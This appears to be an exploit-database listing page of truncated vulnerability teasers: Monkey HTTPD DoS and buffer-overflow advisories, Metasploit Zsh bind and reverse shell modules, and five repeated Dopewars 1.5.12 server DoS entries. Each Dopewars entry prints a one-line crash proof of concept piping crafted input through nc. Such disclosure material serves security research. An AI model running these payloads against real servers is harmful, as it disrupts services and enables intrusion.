Monkey HTTPD 1.1.1 - Crash PoC

No description provided by source. Title: ====== Monkey HTTPD 1.1.1 - Denial of Service Vulnerability Date: ===== 2013-05-28 References: =========== http://bugs.monkey-project.com/ticket/181 Introduction: ============= Monkey is a lightweight and powerful web server for GNU/Linux. It has been...

Unix Command Shell, Bind TCP (via Zsh)

Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module...

Unix Command Shell, Reverse TCP (via Zsh)

Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule...

Monkey 1.2.0 Buffer Overflow

Title CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS Vulnerability With Possible Arbitrary Code Execution 2. Introduction Monkey is a lightweight and powerful web server for GNU/Linux. It has been designed to be very scalable with low memory and CPU consumption, the perfect solution for...

Dopewars 1.5.12 Server Denial of Service

No description provided by source. Description The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack \ of input validation. POC ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902 Fix This issue is resolved in the SVN version of the applicatio...

Dopewars 1.5.12 Server Denial of Service

Description The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation. POC ruby -e 'print "foo^^Ar1111111n^^Acfoon^AV65536n"' | nc localhost 7902 Fix This issue is resolved in the SVN version of the application. Discovered by Doug Prostko...

Dopewars Server 1.5.12 - Denial of Service

Dopewars Server 1.5.12 - Denial of Service Description The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation. POC ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902 Fix This issue is resolved in the SVN version of the...

Dopewars 1.5.12 Denial Of Service

Description The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation. POC ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902 Fix This issue is resolved in the SVN version of the application. Discovered by Doug Prostko...

Dopewars Server 1.5.12 - Denial of Service

Description The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation. POC ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902 Fix This issue is resolved in the SVN version of the application. Discovered by Doug Prostko...